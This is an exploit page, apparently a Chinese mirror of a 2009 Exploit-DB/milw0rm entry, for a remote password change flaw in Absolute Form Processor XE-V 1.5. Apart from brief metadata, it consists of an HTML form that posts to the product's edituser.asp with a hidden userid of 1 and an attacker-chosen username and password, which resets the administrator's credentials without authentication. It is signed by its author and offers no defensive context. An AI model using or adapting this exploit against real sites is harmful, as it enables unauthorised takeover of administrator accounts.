Absolute Form Processor XE-V 1.5 - Remote Change Password

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057738 漏洞类型
发布时间 2009-04-24 更新时间 2009-04-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8530
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<title> Absolute Form Processor XE-V 1.5 Remote Change Pasword  </title>
<body bgcolor="#FFFFFF" text="#000000">
<form name="form1" method="post" action="http://www.xigla.com/absolutefp/demo/edituser.asp">
  <table width="96%" border="0" cellspacing="2" cellpadding="2" align="center">
    <tr>
      <td>Home:http://www.xigla.com</td>

    
          <input type="hidden" name="userid" value="1">
          
        </div></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>

    
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC"><b><font size="2" face="Arial, Helvetica, sans-serif">E-mail
        :</font></b></td>
      <td width="71%" bgcolor="#F3F3F3"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="text" name="email" size="40" value="email@here.com" maxlength="250" >

        </font></b></td>
    </tr>
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC"><b><font size="2" face="Arial, Helvetica, sans-serif">Username
        :</font></b></td>
      <td width="71%" bgcolor="#F3F3F3"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="text" name="usr" size="40" value="admin" maxlength="250">
        </font></b></td>
    </tr>
    
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC" height="27"><b><font size="2" face="Arial, Helvetica, sans-serif">Password
        :</font></b></td>

      <td width="71%" bgcolor="#F3F3F3" height="27"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="password" name="pwd" size="40" value="admin" maxlength="250">
        </font></b></td>
    </tr>
    
    </form>
<p><b><font face="Arial, Helvetica, sans-serif" size="2">                                                                              
Cod[3]d By ThE g0bL!N</font></b></p>
    <tr>
      <td width="28%" bgcolor="#CCCCCC">  </td>
      <td width="72%" bgcolor="#F3F3F3"> <input type="submit" name="button" value="Save User">
      </td>
    </tr>

# milw0rm.com [2009-04-24]